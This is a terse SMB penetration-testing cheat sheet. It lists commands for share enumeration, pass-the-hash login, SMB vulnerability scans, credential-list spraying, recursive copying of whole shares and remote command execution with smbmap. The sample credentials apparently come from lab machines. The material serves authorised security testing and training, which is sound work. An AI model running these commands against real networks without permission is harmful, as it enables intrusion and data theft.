Show shares with smbclient:
smbclient --no-pass -L //$target
smbclient -U guest //$target/
smbclient -U Administrator --pw-nt-hash $NTLMHASH \\\\$target\\directory
Show shares with other clients:
smbmap -R -H $target # No user
smbmap -u L4mpje -p 'bureaulampje' -d WORKGROUP -H $target -R # User
nmap -sV --script=smb-enum-shares -p445 $target
crackmapexec smb $target -u '' -p '' --shares
Vulnerability scan
nmap --script='smb-vul*' -p445 $target
proxychains4 nmap --script='smb-vul*' -p445 -Pn -sT $target
Enumerate through an existing list of users and passwords:
# other_users.txt holds one username,password pair per line
while IFS=',' read -r username password; do
  echo "$username / $password"
  smbmap -R -H "$target" -u "$username" -p "$password"
done < other_users.txt
Mount directory
mount -t cifs -o user=bob,domain=THINC.LOCAL,vers=1.0 //$target/Bob /mnt
Copy whole share with smbclient (other option for subdirectory):
smbclient "//$target/sharename" -N -c 'prompt OFF;recurse ON;mget *'
Execute commands
smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target
See also the Impacket post
Connect to shares via cmd
Use the following to connect from one client to another:
net use M: \\$target\share $password /u:$domain\$username
Afterwards, always disconnect!
net use \\$target /del
Show all drives:
net use